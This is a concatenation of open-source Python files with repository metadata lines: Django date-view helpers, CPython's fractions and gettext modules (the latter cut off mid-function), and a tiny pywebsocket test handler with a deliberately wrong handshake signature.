get_object(self, queryset=None): """ Get the object this request displays. """ year = self.get_year() month = self.get_month() day = self.get_day() date = _date_from_string(year, self.get_year_format(), month, self.get_month_format(), day, self.get_day_format()) # Use a custom queryset if provided qs = self.get_queryset() if queryset is None else queryset if not self.get_allow_future() and date > datetime.date.today(): raise Http404(_( "Future %(verbose_name_plural)s not available because " "%(class_name)s.allow_future is False.") % { 'verbose_name_plural': qs.model._meta.verbose_name_plural, 'class_name': self.__class__.__name__, }, ) # Filter down a queryset from self.queryset using the date from the # URL. This'll get passed as the queryset to DetailView.get_object, # which'll handle the 404 lookup_kwargs = self._make_single_date_lookup(date) qs = qs.filter(**lookup_kwargs) return super(BaseDetailView, self).get_object(queryset=qs) class DateDetailView(SingleObjectTemplateResponseMixin, BaseDateDetailView): """ Detail view of a single object on a single date; this differs from the standard DetailView by accepting a year/month/day in the URL. """ template_name_suffix = '_detail' def _date_from_string(year, year_format, month='', month_format='', day='', day_format='', delim='__'): """ Helper: get a datetime.date object given a format string and a year, month, and day (only year is mandatory). Raise a 404 for an invalid date. """ format = delim.join((year_format, month_format, day_format)) datestr = delim.join((year, month, day)) try: return datetime.datetime.strptime(force_str(datestr), format).date() except ValueError: raise Http404(_("Invalid date string '%(datestr)s' given format '%(format)s'") % { 'datestr': datestr, 'format': format, }) def _get_next_prev(generic_view, date, is_previous, period): """ Helper: Get the next or the previous valid date. The idea is to allow links on month/day views to never be 404s by never providing a date that'll be invalid for the given view. This is a bit complicated since it handles different intervals of time, hence the coupling to generic_view. However in essence the logic comes down to: * If allow_empty and allow_future are both true, this is easy: just return the naive result (just the next/previous day/week/month, regardless of object existence.) * If allow_empty is true, allow_future is false, and the naive result isn't in the future, then return it; otherwise return None. * If allow_empty is false and allow_future is true, return the next date *that contains a valid object*, even if it's in the future. If there are no next objects, return None. * If allow_empty is false and allow_future is false, return the next date that contains a valid object. If that date is in the future, or if there are no next objects, return None. """ date_field = generic_view.get_date_field() allow_empty = generic_view.get_allow_empty() allow_future = generic_view.get_allow_future() get_current = getattr(generic_view, '_get_current_%s' % period) get_next = getattr(generic_view, '_get_next_%s' % period) # Bounds of the current interval start, end = get_current(date), get_next(date) # If allow_empty is True, the naive result will be valid if allow_empty: if is_previous: result = get_current(start - datetime.timedelta(days=1)) else: result = end if allow_future or result <= timezone_today(): return result else: return None # Otherwise, we'll need to go to the database to look for an object # whose date_field is at least (greater than/less than) the given # naive result else: # Construct a lookup and an ordering depending on whether we're doing # a previous date or a next date lookup. if is_previous: lookup = {'%s__lt' % date_field: generic_view._make_date_lookup_arg(start)} ordering = '-%s' % date_field else: lookup = {'%s__gte' % date_field: generic_view._make_date_lookup_arg(end)} ordering = date_field # Filter out objects in the future if appropriate. if not allow_future: # Fortunately, to match the implementation of allow_future, # we need __lte, which doesn't conflict with __lt above. if generic_view.uses_datetime_field: now = timezone.now() else: now = timezone_today() lookup['%s__lte' % date_field] = now qs = generic_view.get_queryset().filter(**lookup).order_by(ordering) # Snag the first object from the queryset; if it doesn't exist that # means there's no next/previous link available. try: result = getattr(qs[0], date_field) except IndexError: return None # Convert datetimes to dates in the current time zone. if generic_view.uses_datetime_field: if settings.USE_TZ: result = timezone.localtime(result) result = result.date() # Return the first day of the period. return get_current(result) def timezone_today(): """ Return the current date in the current time zone. """ if settings.USE_TZ: return timezone.localtime(timezone.now()).date() else: return datetime.date.today()
bsd-3-clause
gautamMalu/rootfs_xen_arndale
usr/lib/python3.4/fractions.py
722
23203
# Originally contributed by Sjoerd Mullender. # Significantly modified by Jeffrey Yasskin <jyasskin at gmail.com>. """Fraction, infinite-precision, real numbers.""" from decimal import Decimal import math import numbers import operator import re import sys __all__ = ['Fraction', 'gcd'] def gcd(a, b): """Calculate the Greatest Common Divisor of a and b. Unless b==0, the result will have the same sign as b (so that when b is divided by it, the result comes out positive). """ while b: a, b = b, a%b return a # Constants related to the hash implementation; hash(x) is based # on the reduction of x modulo the prime _PyHASH_MODULUS. _PyHASH_MODULUS = sys.hash_info.modulus # Value to be used for rationals that reduce to infinity modulo # _PyHASH_MODULUS. _PyHASH_INF = sys.hash_info.inf _RATIONAL_FORMAT = re.compile(r""" \A\s* # optional whitespace at the start, then (?P<sign>[-+]?) # an optional sign, then (?=\d|\.\d) # lookahead for digit or .digit (?P<num>\d*) # numerator (possibly empty) (?: # followed by (?:/(?P<denom>\d+))? # an optional denominator | # or (?:\.(?P<decimal>\d*))? # an optional fractional part (?:E(?P<exp>[-+]?\d+))? # and optional exponent ) \s*\Z # and optional whitespace to finish """, re.VERBOSE | re.IGNORECASE) class Fraction(numbers.Rational): """This class implements rational numbers. In the two-argument form of the constructor, Fraction(8, 6) will produce a rational number equivalent to 4/3. Both arguments must be Rational. The numerator defaults to 0 and the denominator defaults to 1 so that Fraction(3) == 3 and Fraction() == 0. Fractions can also be constructed from: - numeric strings similar to those accepted by the float constructor (for example, '-2.3' or '1e10') - strings of the form '123/456' - float and Decimal instances - other Rational instances (including integers) """ __slots__ = ('_numerator', '_denominator') # We're immutable, so use __new__ not __init__ def __new__(cls, numerator=0, denominator=None): """Constructs a Rational. Takes a string like '3/2' or '1.5', another Rational instance, a numerator/denominator pair, or a float. Examples -------- >>> Fraction(10, -8) Fraction(-5, 4) >>> Fraction(Fraction(1, 7), 5) Fraction(1, 35) >>> Fraction(Fraction(1, 7), Fraction(2, 3)) Fraction(3, 14) >>> Fraction('314') Fraction(314, 1) >>> Fraction('-35/4') Fraction(-35, 4) >>> Fraction('3.1415') # conversion from numeric string Fraction(6283, 2000) >>> Fraction('-47e-2') # string may include a decimal exponent Fraction(-47, 100) >>> Fraction(1.47) # direct construction from float (exact conversion) Fraction(6620291452234629, 4503599627370496) >>> Fraction(2.25) Fraction(9, 4) >>> Fraction(Decimal('1.47')) Fraction(147, 100) """ self = super(Fraction, cls).__new__(cls) if denominator is None: if isinstance(numerator, numbers.Rational): self._numerator = numerator.numerator self._denominator = numerator.denominator return self elif isinstance(numerator, float): # Exact conversion from float value = Fraction.from_float(numerator) self._numerator = value._numerator self._denominator = value._denominator return self elif isinstance(numerator, Decimal): value = Fraction.from_decimal(numerator) self._numerator = value._numerator self._denominator = value._denominator return self elif isinstance(numerator, str): # Handle construction from strings. m = _RATIONAL_FORMAT.match(numerator) if m is None: raise ValueError('Invalid literal for Fraction: %r' % numerator) numerator = int(m.group('num') or '0') denom = m.group('denom') if denom: denominator = int(denom) else: denominator = 1 decimal = m.group('decimal') if decimal: scale = 10**len(decimal) numerator = numerator * scale + int(decimal) denominator *= scale exp = m.group('exp') if exp: exp = int(exp) if exp >= 0: numerator *= 10**exp else: denominator *= 10**-exp if m.group('sign') == '-': numerator = -numerator else: raise TypeError("argument should be a string " "or a Rational instance") elif (isinstance(numerator, numbers.Rational) and isinstance(denominator, numbers.Rational)): numerator, denominator = ( numerator.numerator * denominator.denominator, denominator.numerator * numerator.denominator ) else: raise TypeError("both arguments should be " "Rational instances") if denominator == 0: raise ZeroDivisionError('Fraction(%s, 0)' % numerator) g = gcd(numerator, denominator) self._numerator = numerator // g self._denominator = denominator // g return self @classmethod def from_float(cls, f): """Converts a finite float to a rational number, exactly. Beware that Fraction.from_float(0.3) != Fraction(3, 10). """ if isinstance(f, numbers.Integral): return cls(f) elif not isinstance(f, float): raise TypeError("%s.from_float() only takes floats, not %r (%s)" % (cls.__name__, f, type(f).__name__)) if math.isnan(f): raise ValueError("Cannot convert %r to %s." % (f, cls.__name__)) if math.isinf(f): raise OverflowError("Cannot convert %r to %s." % (f, cls.__name__)) return cls(*f.as_integer_ratio()) @classmethod def from_decimal(cls, dec): """Converts a finite Decimal instance to a rational number, exactly.""" from decimal import Decimal if isinstance(dec, numbers.Integral): dec = Decimal(int(dec)) elif not isinstance(dec, Decimal): raise TypeError( "%s.from_decimal() only takes Decimals, not %r (%s)" % (cls.__name__, dec, type(dec).__name__)) if dec.is_infinite(): raise OverflowError( "Cannot convert %s to %s." % (dec, cls.__name__)) if dec.is_nan(): raise ValueError("Cannot convert %s to %s." % (dec, cls.__name__)) sign, digits, exp = dec.as_tuple() digits = int(''.join(map(str, digits))) if sign: digits = -digits if exp >= 0: return cls(digits * 10 ** exp) else: return cls(digits, 10 ** -exp) def limit_denominator(self, max_denominator=1000000): """Closest Fraction to self with denominator at most max_denominator. >>> Fraction('3.141592653589793').limit_denominator(10) Fraction(22, 7) >>> Fraction('3.141592653589793').limit_denominator(100) Fraction(311, 99) >>> Fraction(4321, 8765).limit_denominator(10000) Fraction(4321, 8765) """ # Algorithm notes: For any real number x, define a *best upper # approximation* to x to be a rational number p/q such that: # # (1) p/q >= x, and # (2) if p/q > r/s >= x then s > q, for any rational r/s. # # Define *best lower approximation* similarly. Then it can be # proved that a rational number is a best upper or lower # approximation to x if, and only if, it is a convergent or # semiconvergent of the (unique shortest) continued fraction # associated to x. # # To find a best rational approximation with denominator <= M, # we find the best upper and lower approximations with # denominator <= M and take whichever of these is closer to x. # In the event of a tie, the bound with smaller denominator is # chosen. If both denominators are equal (which can happen # only when max_denominator == 1 and self is midway between # two integers) the lower bound---i.e., the floor of self, is # taken. if max_denominator < 1: raise ValueError("max_denominator should be at least 1") if self._denominator <= max_denominator: return Fraction(self) p0, q0, p1, q1 = 0, 1, 1, 0 n, d = self._numerator, self._denominator while True: a = n//d q2 = q0+a*q1 if q2 > max_denominator: break p0, q0, p1, q1 = p1, q1, p0+a*p1, q2 n, d = d, n-a*d k = (max_denominator-q0)//q1 bound1 = Fraction(p0+k*p1, q0+k*q1) bound2 = Fraction(p1, q1) if abs(bound2 - self) <= abs(bound1-self): return bound2 else: return bound1 @property def numerator(a): return a._numerator @property def denominator(a): return a._denominator def __repr__(self): """repr(self)""" return ('Fraction(%s, %s)' % (self._numerator, self._denominator)) def __str__(self): """str(self)""" if self._denominator == 1: return str(self._numerator) else: return '%s/%s' % (self._numerator, self._denominator) def _operator_fallbacks(monomorphic_operator, fallback_operator): """Generates forward and reverse operators given a purely-rational operator and a function from the operator module. Use this like: __op__, __rop__ = _operator_fallbacks(just_rational_op, operator.op) In general, we want to implement the arithmetic operations so that mixed-mode operations either call an implementation whose author knew about the types of both arguments, or convert both to the nearest built in type and do the operation there. In Fraction, that means that we define __add__ and __radd__ as: def __add__(self, other): # Both types have numerators/denominator attributes, # so do the operation directly if isinstance(other, (int, Fraction)): return Fraction(self.numerator * other.denominator + other.numerator * self.denominator, self.denominator * other.denominator) # float and complex don't have those operations, but we # know about those types, so special case them. elif isinstance(other, float): return float(self) + other elif isinstance(other, complex): return complex(self) + other # Let the other type take over. return NotImplemented def __radd__(self, other): # radd handles more types than add because there's # nothing left to fall back to. if isinstance(other, numbers.Rational): return Fraction(self.numerator * other.denominator + other.numerator * self.denominator, self.denominator * other.denominator) elif isinstance(other, Real): return float(other) + float(self) elif isinstance(other, Complex): return complex(other) + complex(self) return NotImplemented There are 5 different cases for a mixed-type addition on Fraction. I'll refer to all of the above code that doesn't refer to Fraction, float, or complex as "boilerplate". 'r' will be an instance of Fraction, which is a subtype of Rational (r : Fraction <: Rational), and b : B <: Complex. The first three involve 'r + b': 1. If B <: Fraction, int, float, or complex, we handle that specially, and all is well. 2. If Fraction falls back to the boilerplate code, and it were to return a value from __add__, we'd miss the possibility that B defines a more intelligent __radd__, so the boilerplate should return NotImplemented from __add__. In particular, we don't handle Rational here, even though we could get an exact answer, in case the other type wants to do something special. 3. If B <: Fraction, Python tries B.__radd__ before Fraction.__add__. This is ok, because it was implemented with knowledge of Fraction, so it can handle those instances before delegating to Real or Complex. The next two situations describe 'b + r'. We assume that b didn't know about Fraction in its implementation, and that it uses similar boilerplate code: 4. If B <: Rational, then __radd_ converts both to the builtin rational type (hey look, that's us) and proceeds. 5. Otherwise, __radd__ tries to find the nearest common base ABC, and fall back to its builtin type. Since this class doesn't subclass a concrete type, there's no implementation to fall back to, so we need to try as hard as possible to return an actual value, or the user will get a TypeError. """ def forward(a, b): if isinstance(b, (int, Fraction)): return monomorphic_operator(a, b) elif isinstance(b, float): return fallback_operator(float(a), b) elif isinstance(b, complex): return fallback_operator(complex(a), b) else: return NotImplemented forward.__name__ = '__' + fallback_operator.__name__ + '__' forward.__doc__ = monomorphic_operator.__doc__ def reverse(b, a): if isinstance(a, numbers.Rational): # Includes ints. return monomorphic_operator(a, b) elif isinstance(a, numbers.Real): return fallback_operator(float(a), float(b)) elif isinstance(a, numbers.Complex): return fallback_operator(complex(a), complex(b)) else: return NotImplemented reverse.__name__ = '__r' + fallback_operator.__name__ + '__' reverse.__doc__ = monomorphic_operator.__doc__ return forward, reverse def _add(a, b): """a + b""" return Fraction(a.numerator * b.denominator + b.numerator * a.denominator, a.denominator * b.denominator) __add__, __radd__ = _operator_fallbacks(_add, operator.add) def _sub(a, b): """a - b""" return Fraction(a.numerator * b.denominator - b.numerator * a.denominator, a.denominator * b.denominator) __sub__, __rsub__ = _operator_fallbacks(_sub, operator.sub) def _mul(a, b): """a * b""" return Fraction(a.numerator * b.numerator, a.denominator * b.denominator) __mul__, __rmul__ = _operator_fallbacks(_mul, operator.mul) def _div(a, b): """a / b""" return Fraction(a.numerator * b.denominator, a.denominator * b.numerator) __truediv__, __rtruediv__ = _operator_fallbacks(_div, operator.truediv) def __floordiv__(a, b): """a // b""" return math.floor(a / b) def __rfloordiv__(b, a): """a // b""" return math.floor(a / b) def __mod__(a, b): """a % b""" div = a // b return a - b * div def __rmod__(b, a): """a % b""" div = a // b return a - b * div def __pow__(a, b): """a ** b If b is not an integer, the result will be a float or complex since roots are generally irrational. If b is an integer, the result will be rational. """ if isinstance(b, numbers.Rational): if b.denominator == 1: power = b.numerator if power >= 0: return Fraction(a._numerator ** power, a._denominator ** power) else: return Fraction(a._denominator ** -power, a._numerator ** -power) else: # A fractional power will generally produce an # irrational number. return float(a) ** float(b) else: return float(a) ** b def __rpow__(b, a): """a ** b""" if b._denominator == 1 and b._numerator >= 0: # If a is an int, keep it that way if possible. return a ** b._numerator if isinstance(a, numbers.Rational): return Fraction(a.numerator, a.denominator) ** b if b._denominator == 1: return a ** b._numerator return a ** float(b) def __pos__(a): """+a: Coerces a subclass instance to Fraction""" return Fraction(a._numerator, a._denominator) def __neg__(a): """-a""" return Fraction(-a._numerator, a._denominator) def __abs__(a): """abs(a)""" return Fraction(abs(a._numerator), a._denominator) def __trunc__(a): """trunc(a)""" if a._numerator < 0: return -(-a._numerator // a._denominator) else: return a._numerator // a._denominator def __floor__(a): """Will be math.floor(a) in 3.0.""" return a.numerator // a.denominator def __ceil__(a): """Will be math.ceil(a) in 3.0.""" # The negations cleverly convince floordiv to return the ceiling. return -(-a.numerator // a.denominator) def __round__(self, ndigits=None): """Will be round(self, ndigits) in 3.0. Rounds half toward even. """ if ndigits is None: floor, remainder = divmod(self.numerator, self.denominator) if remainder * 2 < self.denominator: return floor elif remainder * 2 > self.denominator: return floor + 1 # Deal with the half case: elif floor % 2 == 0: return floor else: return floor + 1 shift = 10**abs(ndigits) # See _operator_fallbacks.forward to check that the results of # these operations will always be Fraction and therefore have # round(). if ndigits > 0: return Fraction(round(self * shift), shift) else: return Fraction(round(self / shift) * shift) def __hash__(self): """hash(self)""" # XXX since this method is expensive, consider caching the result # In order to make sure that the hash of a Fraction agrees # with the hash of a numerically equal integer, float or # Decimal instance, we follow the rules for numeric hashes # outlined in the documentation. (See library docs, 'Built-in # Types'). # dinv is the inverse of self._denominator modulo the prime # _PyHASH_MODULUS, or 0 if self._denominator is divisible by # _PyHASH_MODULUS. dinv = pow(self._denominator, _PyHASH_MODULUS - 2, _PyHASH_MODULUS) if not dinv: hash_ = _PyHASH_INF else: hash_ = abs(self._numerator) * dinv % _PyHASH_MODULUS result = hash_ if self >= 0 else -hash_ return -2 if result == -1 else result def __eq__(a, b): """a == b""" if isinstance(b, numbers.Rational): return (a._numerator == b.numerator and a._denominator == b.denominator) if isinstance(b, numbers.Complex) and b.imag == 0: b = b.real if isinstance(b, float): if math.isnan(b) or math.isinf(b): # comparisons with an infinity or nan should behave in # the same way for any finite a, so treat a as zero. return 0.0 == b else: return a == a.from_float(b) else: # Since a doesn't know how to compare with b, let's give b # a chance to compare itself with a. return NotImplemented def _richcmp(self, other, op): """Helper for comparison operators, for internal use only. Implement comparison between a Rational instance `self`, and either another Rational instance or a float `other`. If `other` is not a Rational instance or a float, return NotImplemented. `op` should be one of the six standard comparison operators. """ # convert other to a Rational instance where reasonable. if isinstance(other, numbers.Rational): return op(self._numerator * other.denominator, self._denominator * other.numerator) if isinstance(other, float): if math.isnan(other) or math.isinf(other): return op(0.0, other) else: return op(self, self.from_float(other)) else: return NotImplemented def __lt__(a, b): """a < b""" return a._richcmp(b, operator.lt) def __gt__(a, b): """a > b""" return a._richcmp(b, operator.gt) def __le__(a, b): """a <= b""" return a._richcmp(b, operator.le) def __ge__(a, b): """a >= b""" return a._richcmp(b, operator.ge) def __bool__(a): """a != 0""" return a._numerator != 0 # support for pickling, copy, and deepcopy def __reduce__(self): return (self.__class__, (str(self),)) def __copy__(self): if type(self) == Fraction: return self # I'm immutable; therefore I am my own clone return self.__class__(self._numerator, self._denominator) def __deepcopy__(self, memo): if type(self) == Fraction: return self # My components are also immutable return self.__class__(self._numerator, self._denominator)
gpl-2.0
Sendoushi/servo
tests/wpt/web-platform-tests/tools/pywebsocket/src/test/testdata/handlers/sub/wrong_handshake_sig_wsh.py
499
1859
# Copyright 2009, Google Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """Wrong web_socket_do_extra_handshake signature. """ def no_web_socket_do_extra_handshake(request): pass def web_socket_transfer_data(request): request.connection.write( 'sub/wrong_handshake_sig_wsh.py is called for %s, %s' % (request.ws_resource, request.ws_protocol)) # vi:sts=4 sw=4 et
mpl-2.0
weimingtom/python-for-android
python3-alpha/python3-src/Lib/gettext.py
50
17656
"""Internationalization and localization support. This module provides internationalization (I18N) and localization (L10N) support for your Python programs by providing an interface to the GNU gettext message catalog library. I18N refers to the operation by which a program is made aware of multiple languages. L10N refers to the adaptation of your program, once internationalized, to the local language and cultural habits. """ # This module represents the integration of work, contributions, feedback, and # suggestions from the following people: # # Martin von Loewis, who wrote the initial implementation of the underlying # C-based libintlmodule (later renamed _gettext), along with a skeletal # gettext.py implementation. # # Peter Funk, who wrote fintl.py, a fairly complete wrapper around intlmodule, # which also included a pure-Python implementation to read .mo files if # intlmodule wasn't available. # # James Henstridge, who also wrote a gettext.py module, which has some # interesting, but currently unsupported experimental features: the notion of # a Catalog class and instances, and the ability to add to a catalog file via # a Python API. # # Barry Warsaw integrated these modules, wrote the .install() API and code, # and conformed all C and Python code to Python's coding standards. # # Francois Pinard and Marc-Andre Lemburg also contributed valuably to this # module. # # J. David Ibanez implemented plural forms. Bruno Haible fixed some bugs. # # TODO: # - Lazy loading of .mo files. Currently the entire catalog is loaded into # memory, but that's probably bad for large translated programs. Instead, # the lexical sort of original strings in GNU .mo files should be exploited # to do binary searches and lazy initializations. Or you might want to use # the undocumented double-hash algorithm for .mo files with hash tables, but # you'll need to study the GNU gettext code to do this. # # - Support Solaris .mo file formats. Unfortunately, we've been unable to # find this format documented anywhere. import locale, copy, io, os, re, struct, sys from errno import ENOENT __all__ = ['NullTranslations', 'GNUTranslations', 'Catalog', 'find', 'translation', 'install', 'textdomain', 'bindtextdomain', 'dgettext', 'dngettext', 'gettext', 'ngettext', ] _default_localedir = os.path.join(sys.prefix, 'share', 'locale') def c2py(plural): """Gets a C expression as used in PO files for plural forms and returns a Python lambda function that implements an equivalent expression. """ # Security check, allow only the "n" identifier import token, tokenize tokens = tokenize.generate_tokens(io.StringIO(plural).readline) try: danger = [x for x in tokens if x[0] == token.NAME and x[1] != 'n'] except tokenize.TokenError: raise ValueError('plural forms expression error, maybe unbalanced parenthesis') else: if danger: raise ValueError('plural forms expression could be dangerous') # Replace some C operators by their Python equivalents plural = plural.replace('&&', ' and ') plural = plural.replace('||', ' or ') expr = re.compile(r'\!([^=])') plural = expr.sub(' not \\1', plural) # Regular expression and replacement function used to transform # "a?b:c" to "b if a else c". expr = re.compile(r'(.*?)\?(.*?):(.*)') def repl(x): return "(%s if %s else %s)" % (x.group(2), x.group(1), expr.sub(repl, x.group(3))) # Code to transform the plural expression, taking care of parentheses stack = [''] for c in plural: if c == '(': stack.append('') elif c == ')': if len(stack) == 1: # Actually, we never reach this code, because unbalanced # parentheses get caught in the security check at the # beginning. raise ValueError('unbalanced parenthesis in plural form') s = expr.sub(repl, stack.pop()) stack[-1] += '(%s)' % s else: stack[-1] += c plural = expr.sub(repl, stack.pop()) return eval('lambda n: int(%s)' % plural) def _expand_lang(loc): loc = locale.normalize(loc) COMPONENT_CODESET = 1 << 0 COMPONENT_TERRITORY = 1 << 1 COMPONENT_MODIFIER = 1 << 2 # split up the locale into its base components mask = 0 pos = loc.find('@') if pos >= 0: modifier = loc[pos:] loc = loc[:pos] mask |= COMPONENT_MODIFIER else: modifier = '' pos = loc.find('.') if pos >= 0: codeset = loc[pos:] loc = loc[:pos] mask |= COMPONENT_CODESET else: codeset = '' pos = loc.find('_') if pos >= 0: territory = loc[pos:] loc = loc[:pos] mask |= COMPONENT_TERRITORY else: territory = '' language = loc ret = [] for i in range(mask+1): if not (i & ~mask): # if all components for this combo exist ... val = language if i & COMPONENT_TERRITORY: val += territory if i & COMPONENT_CODESET: val += codeset if i & COMPONENT_MODIFIER: val += modifier ret.append(val) ret.reverse() return ret class NullTranslations: def __init__(self, fp=None): self._info = {} self._charset = None self._output_charset = None self._fallback = None if fp is not None: self._parse(fp) def _parse(self, fp): pass def add_fallback(self, fallback): if self._fallback: self._fallback.add_fallback(fallback) else: self._fallback = fallback def gettext(self, message): if self._fallback: return self._fallback.gettext(message) return message def lgettext(self, message): if self._fallback: return self._fallback.lgettext(message) return message def ngettext(self, msgid1, msgid2, n): if self._fallback: return self._fallback.ngettext(msgid1, msgid2, n) if n == 1: return msgid1 else: return msgid2 def lngettext(self, msgid1, msgid2, n): if self._fallback: return self._fallback.lngettext(msgid1, msgid2, n) if n == 1: return msgid1 else: return msgid2 def info(self): return self._info def charset(self): return self._charset def output_charset(self): return self._output_charset def set_output_charset(self, charset): self._output_charset = charset def install(self, names=None): import builtins builtins.__dict__['_'] = self.gettext if hasattr(names, "__contains__"): if "gettext" in names: builtins.__dict__['gettext'] = builtins.__dict__['_'] if "ngettext" in names: builtins.__dict__['ngettext'] = self.ngettext if "lgettext" in names: builtins.__dict__['lgettext'] = self.lgettext if "lngettext" in names: builtins.__dict__['lngettext'] = self.lngettext class GNUTranslations(NullTranslations): # Magic number of .mo files LE_MAGIC = 0x950412de BE_MAGIC = 0xde120495 def _parse(self, fp): """Override this method to support alternative .mo formats.""" unpack = struct.unpack filename = getattr(fp, 'name', '') # Parse the .mo file header, which consists of 5 little endian 32 # bit words. self._catalog = catalog = {} self.plural = lambda n: int(n != 1) # germanic plural by default buf = fp.read() buflen = len(buf) # Are we big endian or little endian? magic = unpack('<I', buf[:4])[0] if magic == self.LE_MAGIC: version, msgcount, masteridx, transidx = unpack('<4I', buf[4:20]) ii = '<II' elif magic == self.BE_MAGIC: version, msgcount, masteridx, transidx = unpack('>4I', buf[4:20]) ii = '>II' else: raise IOError(0, 'Bad magic number', filename) # Now put all messages from the .mo file buffer into the catalog # dictionary. for i in range(0, msgcount): mlen, moff = unpack(ii, buf[masteridx:masteridx+8]) mend = moff + mlen tlen, toff = unpack(ii, buf[transidx:transidx+8]) tend = toff + tlen if mend < buflen and tend < buflen: msg = buf[moff:mend] tmsg = buf[toff:tend] else: raise IOError(0, 'File is corrupt', filename) # See if we're looking at GNU .mo conventions for metadata if mlen == 0: # Catalog description lastk = k = None for b_item in tmsg.split('\n'.encode("ascii")): item = b_item.decode().strip() if not item: continue if ':' in item: k, v = item.split(':', 1) k = k.strip().lower() v = v.strip() self._info[k] = v lastk = k elif lastk: self._info[lastk] += '\n' + item if k == 'content-type': self._charset = v.split('charset=')[1] elif k == 'plural-forms': v = v.split(';') plural = v[1].split('plural=')[1] self.plural = c2py(plural) # Note: we unconditionally convert both msgids and msgstrs to # Unicode using the character encoding specified in the charset # parameter of the Content-Type header. The gettext documentation # strongly encourages msgids to be us-ascii, but some applications # require alternative encodings (e.g. Zope's ZCML and ZPT). For # traditional gettext applications, the msgid conversion will # cause no problems since us-ascii should always be a subset of # the charset encoding. We may want to fall back to 8-bit msgids # if the Unicode conversion fails. charset = self._charset or 'ascii' if b'\x00' in msg: # Plural forms msgid1, msgid2 = msg.split(b'\x00') tmsg = tmsg.split(b'\x00') msgid1 = str(msgid1, charset) for i, x in enumerate(tmsg): catalog[(msgid1, i)] = str(x, charset) else: catalog[str(msg, charset)] = str(tmsg, charset) # advance to next entry in the seek tables masteridx += 8 transidx += 8 def lgettext(self, message): missing = object() tmsg = self._catalog.get(message, missing) if tmsg is missing: if self._fallback: return self._fallback.lgettext(message) return message if self._output_charset: return tmsg.encode(self._output_charset) return tmsg.encode(locale.getpreferredencoding()) def lngettext(self, msgid1, msgid2, n): try: tmsg = self._catalog[(msgid1, self.plural(n))] if self._output_charset: return tmsg.encode(self._output_charset) return tmsg.encode(locale.getpreferredencoding()) except KeyError: if self._fallback: return self._fallback.lngettext(msgid1, msgid2, n) if n == 1: return msgid1 else: return msgid2 def gettext(self, message): missing = object() tmsg = self._catalog.get(message, missing) if tmsg is missing: if self._fallback: return self._fallback.gettext(message) return message return tmsg def ngettext(self, msgid1, msgid2, n): try: tmsg = self._catalog[(msgid1, self.plural(n))] except KeyError: if self._fallback: return self._fallback.ngettext(msgid1, msgid2, n) if n == 1: tmsg = msgid1 else: tmsg = msgid2 return tmsg # Locate a .mo file using the gettext strategy def find(domain, localedir=None, languages=None, all=False): # Get some reasonable defaults for arguments that were not supplied if localedir is None: localedir = _default_localedir if languages is None: languages = [] for envar in ('LANGUAGE', 'LC_ALL', 'LC_MESSAGES', 'LANG'): val = os.environ.get(envar) if val: languages = val.split(':') break if 'C' not in languages: languages.append('C') # now normalize and expand the languages nelangs = [] for lang in languages: for nelang in _expand_lang(lang): if nelang not in nelangs: nelangs.append(nelang) # select a language if all: result = [] else: result = None for lang in nelangs: if lang == 'C': break mofile = os.path.join(localedir, lang, 'LC_MESSAGES', '%s.mo' % domain) if os.path.exists(mofile): if all: result.append(mofile) else: return mofile return result # a mapping between absolute .mo file path and Translation object _translations = {} def translation(domain, localedir=None, languages=None, class_=None, fallback=False, codeset=None): if class_ is None: class_ = GNUTranslations mofiles = find(domain, localedir, languages, all=True) if not mofiles: if fallback: return NullTranslations() raise IOError(ENOENT, 'No translation file found for domain', domain) # Avoid opening, reading, and parsing the .mo file after it's been done # once. result = None for mofile in mofiles: key = (class_, os.path.abspath(mofile)) t = _translations.get(key) if t is None: with open(mofile, 'rb') as fp: t = _translations.setdefault(key, class_(fp)) # Copy the translation object to allow setting fallbacks and # output charset. All other instance data is shared with the # cached object. t = copy.copy(t) if codeset: t.set_output_charset(codeset) if result is None: result = t else: result.add_fallback(t) return result def install(domain, localedir=None, codeset=None, names=None): t = translation(domain, localedir, fallback=True, codeset=codeset) t.install(names) # a mapping b/w domains and locale directories _localedirs = {} # a mapping b/w domains and codesets _localecodesets = {} # current global domain, `messages' used for compatibility w/ GNU gettext _current_domain = 'messages' def textdomain(domain=None): global _current_domain if domain is not None: _current_domain = domain return _current_domain def bindtextdomain(domain, localedir=None): global _localedirs if localedir is not None: _localedirs[domain] = localedir return _localedirs.get(domain, _default_localedir) def bind_textdomain_codeset(domain, codeset=None): global _localecodesets if codeset is not None: _localecodesets[domain] = codeset return _localecodesets.get(domain) def dgettext(domain, message): try: t = translation(domain, _localedirs.get(domain, None), codeset=_localecodesets.get(domain)) except IOError: return message return t.gettext(message) def ldgettext(domain, message): try: t = translation(domain, _localedirs.get(domain, None), codeset=_localecodesets.get(domain)) except IOError: return message return t.lgettext(message) def dngettext(domain, msgid1, msgid2, n): try: t = translation(domain, _localedirs.get(domain, None), codeset=_localecodesets.get(domain)) except IOError: if n == 1: return msgid1 else: return msgid2 return t.ngettext(msgid1, msgid2, n) def ldngettext(domain, msgid1, msgid2, n): try: t = translation(domain, _localedirs.get(domain, None), codeset=_localecodesets.get(domain)) except IOError: if n == 1: return msgid1 else: return msgid2 return t.lngettext(msgid1, msgid2, n) def gettext(message): return dgettext(_current_domain, message) def lgettext(message): return 